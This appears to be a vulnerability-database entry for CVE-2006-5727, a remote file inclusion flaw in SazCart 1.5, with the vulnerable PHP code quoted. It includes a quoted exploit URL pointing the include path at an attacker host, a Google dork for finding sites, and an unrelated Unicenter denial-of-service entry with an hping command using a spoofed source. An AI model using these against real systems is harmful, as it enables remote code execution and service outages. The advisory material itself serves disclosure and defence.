CVE-2006-5727
Published 2006-11-06
Priority: P3 (37) · Severity: medium · CVSS 2.0 base score: 5.1 · Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 3.32% (87.1st percentile)
PHP remote file inclusion vulnerability in admin/controls/cart.php in sazcart 1.5 allows remote attackers to execute arbitrary PHP code via the (1) _saz[settings][shippingfolder] and (2) _saz[settings][taxfolder] parameters.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sazcart | sazcart | — | — |
No detection rules found.
Exploit-DB: SazCart 1.5 - 'cart.php' Remote File Inclusion (exploitdb, 2006-11-04, CVE-2006-5727)
sazcart v1.5 (cart.php) Remote File Include
*********************---Hitamputih crew---********************************
* Bug found by: IbnuSina
* Vendor: http://sazcart.com/site
* Risk: High
* Greetz: *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
* and all members of the hitamputih crew community www.kaipank.org/forum
* Especially thx to [email protected]

Bug found in admin/controls/cart.php:

```php
// Vulnerable code from admin/controls/cart.php in SazCart 1.5:
// $_saz['settings'] is taken from request input, so the include path
// is attacker-controlled (remote file inclusion when allow_url_include is on).
include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;
```

Exploit:
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?

Google dork: "powered by sazcart"
# milw0rm.co
Exploit-DB: Computer Associates Unicenter 6.0 - Remote Control DM Primer Remote Denial of Service (exploitdb, 2006-01-17, CVE-2006-0306)
source: https://www.securityfocus.com/bid/16276/info
Computer Associates Unicenter Remote Control DM Primer is prone to a denial-of-service vulnerability.
Attackers may trigger a denial of service due to a hang. Note that an attacker may easily spoof source IP addresses because the service uses UDP.
Proof of concept:
`hping -2 -s 1025 -p 5727 -d 4097 -a 1.1.1.1`
No writeups or analysis indexed.
References:
- http://secunia.com/advisories/22708
- http://www.attrition.org/pipermail/vim/2007-January/001232.html
- http://www.osvdb.org/30194
- http://www.securityfocus.com/archive/1/456542/100/0/threaded
- http://www.securityfocus.com/bid/20922
- http://www.vupen.com/english/advisories/2006/4343
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30013
- https://www.exploit-db.com/exploits/2718